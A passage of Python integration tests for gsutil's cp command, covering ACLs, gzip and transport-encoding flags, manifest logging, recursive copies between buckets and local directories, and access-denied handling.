['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
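"""Tests copying an object to stdout."""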
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
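"""Tests copying a local file to stdout."""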
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
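"""Tests uploading and downloading a zero-byte file."""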
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
Regions like us-east-2 accept only V4 signatures, hence we create
the bucket in the us-east-2 region to enforce testing with V4 signatures.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_copy_quiet(self):
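"""Tests that cp with the top-level -q flag suppresses copy output."""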
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
Note that while this does perform a file-to-object upload, MD5s are
not supported for composite objects, so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
# For Python 2 compatibility.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
end_date = datetime.datetime.strptime(results['End'], date_format)
self.assertEqual(end_date > start_date, True)
if self.RunGsUtil == testcase.GsUtilIntegrationTestCase.RunGsUtil:
# Check that we didn't do automatic parallel uploads - compose doesn't
# calculate the MD5 hash. Since RunGsUtil is overridden in
# TestCpParallelUploads to force parallel uploads, we can check which
# method was used.
self.assertEqual(results['Md5'], 'rL0Y20zC+Fzt72VPzMSk2A==')
self.assertEqual(int(results['Source Size']), 3)
self.assertEqual(int(results['Bytes Transferred']), 3)
self.assertEqual(results['Result'], 'OK')
@SequentialAndParallelTransfer
def test_cp_manifest_download(self):
"""Tests downloading with a manifest file."""
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'')
logpath = self.CreateTempFile(contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(
['cp', '-L', logpath, suri(key_uri), fpath], return_stdout=True)
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY3:
decode_lines = []
for line in lines:
if line.startswith("b'"):
some_strs = line.split(',')
line_parts = []
for some_str in some_strs:
if some_str.startswith("b'"):
line_parts.append(ast.literal_eval(some_str).decode(UTF8))
else:
line_parts.append(some_str)
decode_lines.append(','.join(line_parts))
else:
decode_lines.append(line)
lines = decode_lines
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
self.assertEqual(results[0][:5], '%s://' % self.default_provider) # source
self.assertEqual(results[1][:7], 'file://') # destination
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results[2], date_format)
end_date = datetime.datetime.strptime(results[3], date_format)
self.assertEqual(end_date > start_date, True)
self.assertEqual(int(results[6]), 3) # Source Size
# Bytes transferred might be more than 3 if the file was gzipped, since
# the minimum gzip header is 10 bytes.
self.assertGreaterEqual(int(results[7]), 3) # Bytes Transferred
self.assertEqual(results[8], 'OK') # Result
@SequentialAndParallelTransfer
def test_copy_unicode_non_ascii_filename(self):
key_uri = self.CreateObject()
# Try with and without resumable upload threshold, to ensure that each
# scenario works. In particular, resumable uploads have tracker filename
# logic.
file_contents = b'x' * START_CALLBACK_PER_BYTES * 2
fpath = self.CreateTempFile(file_name='Аудиоархив', contents=file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', '1')]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEqual(stdout.encode('ascii'), file_contents)
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold',
str(START_CALLBACK_PER_BYTES * 3))]):
self.RunGsUtil(['cp', fpath, suri(key_uri)], return_stderr=True)
stdout = self.RunGsUtil(['cat', suri(key_uri)], return_stdout=True)
self.assertEqual(stdout.encode('ascii'), file_contents)
# Note: We originally implemented a test
# (test_copy_invalid_unicode_filename) verifying that invalid unicode
# filenames were skipped, but it turns out os.walk() on macOS has no problem
# with such files (so that test failed). Given that, we decided to remove
# the test.
@SequentialAndParallelTransfer
def test_gzip_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
# Test that copying specifying only 2 of the 3 prefixes gzips the correct
# files, and test that including whitespace in the extension list works.
self.RunGsUtil([
'cp', '-z', 'js, html',
os.path.join(tmpdir, 'test.*'),
suri(bucket_uri)
])
self.AssertNObjectsInBucket(bucket_uri, 3)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-j flag to target specific extensions.
"""
def _create_test_data(): # pylint: disable=invalid-name
"""Setup the bucket and local data to test with.
Returns:
Triplet containing the following values:
bucket_uri: String URI of cloud storage bucket to upload mock data
to.
tmpdir: String, path of a temporary directory to write mock data to.
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
"""
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uris = []
for filename in ('test.html', 'test.js', 'test.txt'):
local_uris.append(
self.CreateTempFile(file_name=filename,
tmpdir=tmpdir,
contents=contents))
return (bucket_uri, tmpdir, local_uris)
def _upload_test_data(tmpdir, bucket_uri): # pylint: disable=invalid-name
"""Upload local test data.
Args:
tmpdir: String, path of a temporary directory to write mock data to.
bucket_uri: String URI of cloud storage bucket to upload mock data to.
Returns:
stderr: String output from running the gsutil command to upload mock
data.
"""
stderr = self.RunGsUtil([
'-D', 'cp', '-j', 'js, html',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)
],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 3)
return stderr
def _assert_sent_compressed(local_uris, stderr): # pylint: disable=invalid-name
"""Ensure the correct files were marked for compression.
Args:
local_uris: Tuple of three strings; each is the file path to a file
containing mock data.
stderr: String output from running the gsutil command to upload mock
data.
"""
local_uri_html, local_uri_js, local_uri_txt = local_uris
assert_base_string = 'Using compressed transport encoding for file://{}.'
self.assertIn(assert_base_string.format(local_uri_html), stderr)
self.assertIn(assert_base_string.format(local_uri_js), stderr)
self.assertNotIn(assert_base_string.format(local_uri_txt), stderr)
def _assert_stored_uncompressed(bucket_uri, contents=b'x' * 10000): # pylint: disable=invalid-name
"""Ensure the files are not compressed when they are stored in the bucket.
Args:
bucket_uri: String with URI for bucket containing uploaded test data.
contents: Byte string stored in each file in the bucket.
"""
local_uri_html = suri(bucket_uri, 'test.html')
local_uri_js = suri(bucket_uri, 'test.js')
local_uri_txt = suri(bucket_uri, 'test.txt')
fpath4 = self.CreateTempFile()
for uri in (local_uri_html, local_uri_js, local_uri_txt):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
# Get mock data, run tests
bucket_uri, tmpdir, local_uris = _create_test_data()
stderr = _upload_test_data(tmpdir, bucket_uri)
_assert_sent_compressed(local_uris, stderr)
_assert_stored_uncompressed(bucket_uri)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_non_resumable(self):
"""Test non resumable, gzip encoded files upload correctly in parallel.
This test generates a small amount of data (e.g. 100 chars) to upload.
Due to the small size, it will be below the resumable threshold,
and tests the behavior of non-resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 100
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_parallel_upload_resumable(self):
"""Test resumable, gzip encoded files upload correctly in parallel.
This test generates a large amount of data (e.g. halt_size amount of chars)
to upload. Due to the large size, it will be above the resumable threshold,
and tests the behavior of resumable uploads.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = get_random_ascii_chars(size=self.halt_size)
tmpdir = self.CreateTempDir(test_files=10, contents=contents)
# Upload the data.
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB))
]):
stderr = self.RunGsUtil(
['-D', '-m', 'cp', '-J', '-r', tmpdir,
suri(bucket_uri)],
return_stderr=True)
# Ensure all objects are uploaded.
self.AssertNObjectsInBucket(bucket_uri, 10)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
@SequentialAndParallelTransfer
def test_gzip_all_upload_and_download(self):
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
self.CreateTempFile(file_name='test.html', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.js', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test.txt', tmpdir=tmpdir, contents=contents)
self.CreateTempFile(file_name='test', tmpdir=tmpdir, contents=contents)
# Test that all files are compressed.
self.RunGsUtil(
['cp', '-Z',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)])
self.AssertNObjectsInBucket(bucket_uri, 4)
uri1 = suri(bucket_uri, 'test.html')
uri2 = suri(bucket_uri, 'test.js')
uri3 = suri(bucket_uri, 'test.txt')
uri4 = suri(bucket_uri, 'test')
stdout = self.RunGsUtil(['stat', uri1], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri2], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri3], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
stdout = self.RunGsUtil(['stat', uri4], return_stdout=True)
self.assertRegex(stdout, r'Content-Encoding:\s+gzip')
fpath4 = self.CreateTempFile()
for uri in (uri1, uri2, uri3, uri4):
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
@SkipForS3('No compressed transport encoding support for S3.')
@SkipForXML('No compressed transport encoding support for the XML API.')
@SequentialAndParallelTransfer
def test_gzip_transport_encoded_all_upload_and_download(self):
"""Test gzip encoded files upload correctly.
This checks that files are not tagged with a gzip content encoding and
that the contents of the files are uncompressed in GCS. This test uses the
-J flag to target all files.
"""
# Setup the bucket and local data.
bucket_uri = self.CreateBucket()
contents = b'x' * 10000
tmpdir = self.CreateTempDir()
local_uri1 = self.CreateTempFile(file_name='test.txt',
tmpdir=tmpdir,
contents=contents)
local_uri2 = self.CreateTempFile(file_name='test',
tmpdir=tmpdir,
contents=contents)
# Upload the data.
stderr = self.RunGsUtil(
['-D', 'cp', '-J',
os.path.join(tmpdir, 'test*'),
suri(bucket_uri)],
return_stderr=True)
self.AssertNObjectsInBucket(bucket_uri, 2)
# Ensure the correct files were marked for compression.
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri1),
stderr)
self.assertIn(
'Using compressed transport encoding for file://%s.' % (local_uri2),
stderr)
# Ensure the progress logger sees a gzip encoding.
self.assertIn('send: Using gzip transport encoding for the request.',
stderr)
# Ensure the files do not have a stored encoding of gzip and are stored
# uncompressed.
remote_uri1 = suri(bucket_uri, 'test.txt')
remote_uri2 = suri(bucket_uri, 'test')
fpath4 = self.CreateTempFile()
for uri in (remote_uri1, remote_uri2):
stdout = self.RunGsUtil(['stat', uri], return_stdout=True)
self.assertNotRegex(stdout, r'Content-Encoding:\s+gzip')
self.RunGsUtil(['cp', uri, suri(fpath4)])
with open(fpath4, 'rb') as f:
self.assertEqual(f.read(), contents)
def test_both_gzip_options_error(self):
"""Test that mixing compression flags error."""
cases = (
# Test with -Z and -z
['cp', '-Z', '-z', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-z', 'html, js', '-Z', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -z and -Z options together is invalid.', stderr)
def test_both_gzip_transport_encoding_options_error(self):
"""Test that mixing transport encoding flags error."""
cases = (
# Test with -J and -j
['cp', '-J', '-j', 'html, js', 'a.js', 'b.js'],
# Same test, but with arguments in the opposite order.
['cp', '-j', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j and -J options together is invalid.', stderr)
def test_combined_gzip_options_error(self):
"""Test that mixing transport encoding and compression flags error."""
cases = (['cp', '-Z', '-j', 'html, js', 'a.js',
'b.js'], ['cp', '-J', '-z', 'html, js', 'a.js',
'b.js'], ['cp', '-j', 'html, js', '-Z', 'a.js', 'b.js'],
['cp', '-z', 'html, js', '-J', 'a.js', 'b.js'])
for case in cases:
stderr = self.RunGsUtil(case, return_stderr=True, expected_status=1)
self.assertIn('CommandException', stderr)
self.assertIn(
'Specifying both the -j/-J and -z/-Z options together is invalid.',
stderr)
def test_upload_with_subdir_and_unexpanded_wildcard(self):
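"""Tests cp -R with a wildcard matching a subdirectory containing a file."""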
fpath1 = self.CreateTempFile(file_name=('tmp', 'x', 'y', 'z'))
bucket_uri = self.CreateBucket()
wildcard_uri = '%s*' % fpath1[:-5]
stderr = self.RunGsUtil(
['cp', '-R', wildcard_uri, suri(bucket_uri)], return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
def test_upload_does_not_raise_with_content_md5_and_check_hashes_never(self):
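"""Tests that upload succeeds with an invalid Content-MD5 when check_hashes is never."""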
fpath1 = self.CreateTempFile(file_name=('foo'))
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'check_hashes', 'never')]):
stderr = self.RunGsUtil(
['-h', 'Content-MD5: invalid-md5', 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True)
self.assertIn('Copying file:', stderr)
self.AssertNObjectsInBucket(bucket_uri, 1)
@SequentialAndParallelTransfer
def test_cp_object_ending_with_slash(self):
"""Tests that cp works with object names ending with slash."""
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/',
contents=b'dir')
self.CreateObject(bucket_uri=bucket_uri,
object_name='abc/def',
contents=b'def')
self.AssertNObjectsInBucket(bucket_uri, 2)
self.RunGsUtil(['cp', '-R', suri(bucket_uri), tmpdir])
# Check that files in the subdir got copied even though subdir object
# download was skipped.
with open(os.path.join(tmpdir, bucket_uri.bucket_name, 'abc', 'def')) as f:
self.assertEqual('def', '\n'.join(f.readlines()))
def test_cp_without_read_access(self):
"""Tests that cp fails without read access to the object."""
# TODO: With 401's triggering retries in apitools, this test will take
# a long time. Ideally, make apitools accept a num_retries config for this
# until we stop retrying the 401's.
bucket_uri = self.CreateBucket()
object_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
# Use @Retry as hedge against bucket listing eventual consistency.
self.AssertNObjectsInBucket(bucket_uri, 1)
if self.default_provider == 's3':
expected_error_regex = r'AccessDenied'
else:
expected_error_regex = r'Anonymous \S+ do(es)? not have'
with self.SetAnonymousBotoCreds():
stderr = self.RunGsUtil(['cp', suri(object_uri), 'foo'],
return_stderr=True,
expected_status=1)
self.assertRegex(stderr, expected_error_regex)
@unittest.skipIf(IS_WINDOWS, 'os.symlink() is not available on Windows.')
def test_cp_minus_r_minus_e(self):
"""Tests that cp -e -r ignores symlinks when recursing."""
bucket_uri = self.CreateBucket()
tmpdir = self.CreateTempDir()
# Create a valid file, since cp expects to copy at least one source URL
# successfully.
self.CreateTempFile(tmpdir=tmpdir, contents=b'foo')
subdir = os.path.join(tmpdir, 'subdir')
os.mkdir(subdir)
